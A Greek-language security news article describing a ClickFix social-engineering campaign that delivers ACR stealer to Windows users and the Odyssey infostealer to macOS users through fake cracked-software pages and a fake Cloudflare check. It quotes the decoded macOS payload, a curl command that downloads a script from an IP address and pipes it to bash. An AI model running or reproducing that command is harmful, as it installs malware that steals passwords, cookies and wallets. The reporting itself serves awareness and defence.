Νέα επίθεση ClickFix που στοχεύει χρήστες Windows και macOS για ανάπτυξη κακόβουλου λογισμικού Infostealer

Μια αυξανόμενη τεχνική κοινωνικής μηχανικής που ονομάζεται ClickFix έχει αναδειχθεί ως μία από τις πιο επιτυχημένες μεθόδους για τη διανομή κακόβουλου λογισμικού τους τελευταίους μήνες.

Αυτή η επίθεση εξαπατά τους χρήστες να αντιγράψουν και να εκτελέσουν εντολές απευθείας στη διεπαφή γραμμής εντολών του λειτουργικού τους συστήματος, εγκαθιστώντας τελικά επικίνδυνο λογισμικό κλοπής πληροφοριών.

Η τεχνική έχει αποδειχθεί εξαιρετικά αποτελεσματική επειδή παρακάμπτει τις παραδοσιακές λύσεις ασφάλειας email και λειτουργεί μέσα σε περιβάλλοντα δοκιμών του προγράμματος περιήγησης όπου τα περισσότερα εργαλεία ασφαλείας δεν μπορούν να εντοπίσουν την κακόβουλη δραστηριότητα.

Η επίθεση συνήθως ξεκινά όταν οι χρήστες αναζητούν σπασμένο λογισμικό μέσω των μηχανών αναζήτησης. Οι εγκληματίες του κυβερνοχώρου δημιουργούν ψεύτικες σελίδες προορισμού που φιλοξενούνται σε αξιόπιστες πλατφόρμες όπως το Google Colab, το Drive, οι Ιστότοποι και οι Ομάδες για να αποφύγουν τον αποκλεισμό τους από συστήματα ασφαλείας.

Αυτές οι σελίδες λειτουργούν ως αρχικά σημεία επαφής που ανακατευθύνουν τα θύματα με βάση το λειτουργικό τους σύστημα. Οι χρήστες των Windows λαμβάνουν το ACR stealer, ενώ οι χρήστες macOS ανακατευθύνονται σε σελίδες που αναπτύσσουν το Odyssey infostealer.

Ερευνητές ασφαλείας Intel471 αναγνωρισθείς αυτή την καμπάνια τον Ιούνιο του 2025 κατά τη διάρκεια ενεργειών κυνηγιού κακόβουλου λογισμικού.

Η έρευνα αποκάλυψε ότι οι παράγοντες απειλών στόχευαν με επιτυχία και τα δύο μεγάλα λειτουργικά συστήματα μέσω μιας ενιαίας υποδομής.

Αλυσίδα μόλυνσης (Πηγή - Intel471) — Αλυσίδα μόλυνσης (Πηγή – Intel471)

Αυτό που κάνει αυτή την επίθεση ιδιαίτερα ανησυχητική είναι η εκτέλεσή της χωρίς αρχεία. Όταν τα θύματα επικολλούν τις εντολές, τα κακόβουλα ωφέλιμα φορτία έλκονται απευθείας στη μνήμη, καθιστώντας τα αόρατα στο παραδοσιακό λογισμικό ασφαλείας.

Μηχανισμός Λοιμώξεων και Τεχνική Εκτέλεση

Για τους χρήστες των Windows, η αλυσίδα επίθεσης καθοδηγεί τα θύματα σε πολλά σημεία ανακατεύθυνσης πριν φτάσουν σε μια σελίδα φιλοξενίας αρχείων MEGA που περιέχει ένα αρχείο ZIP που προστατεύεται με κωδικό πρόσβασης.

Μέσα σε αυτό το αρχείο βρίσκεται ο κλέφτης ACR μεταμφιεσμένος ως setup.exe. Το κακόβουλο λογισμικό όχι μόνο κλέβει διαπιστευτήρια και προσωπικά δεδομένα, αλλά χρησιμεύει και ως φορτωτής, εγκαθιστώντας πρόσθετες απειλές, όπως το SharkClipper, έναν αεροπειρατή προχείρου κρυπτονομισμάτων.

Ψεύτικος έλεγχος ασφαλείας Cloudflare που προτρέπει τους χρήστες να εκτελέσουν μια εντολή ClickFix (Πηγή - Intel471) — Fake έλεγχος ασφαλείας Cloudflare που προτρέπει τους χρήστες να εκτελέσουν μια εντολή ClickFix (Πηγή – Intel471)

Οι χρήστες MacOS αντιμετωπίζουν μια διαφορετική προσέγγιση που περιλαμβάνει μια ψεύτικη σελίδα ελέγχου ασφαλείας Cloudflare. Όταν οι χρήστες προσπαθούν να αντιγράψουν αυτό που φαίνεται να είναι μια συμβολοσειρά επαλήθευσης, στην πραγματικότητα αντιγράφουν μια εντολή κελύφους με κωδικοποίηση Base64.

Μόλις αποκωδικοποιηθεί, αυτή η εντολή εκτελεί:

curl - s http://45.135.232.33/droberto39774 | nohup bash

Αυτή η εντολή κατεβάζει και εκτελεί σιωπηλά το Odyssey stealer, το οποίο συλλέγει κωδικούς πρόσβασης, cookie, πορτοφόλια κρυπτονομισμάτων, Apple Notes, καταχωρήσεις Keychain και δεδομένα συστήματος και, στη συνέχεια, συμπιέζει τα πάντα στο out.zip για εξαγωγή.

VIA: cybersecuritynews.com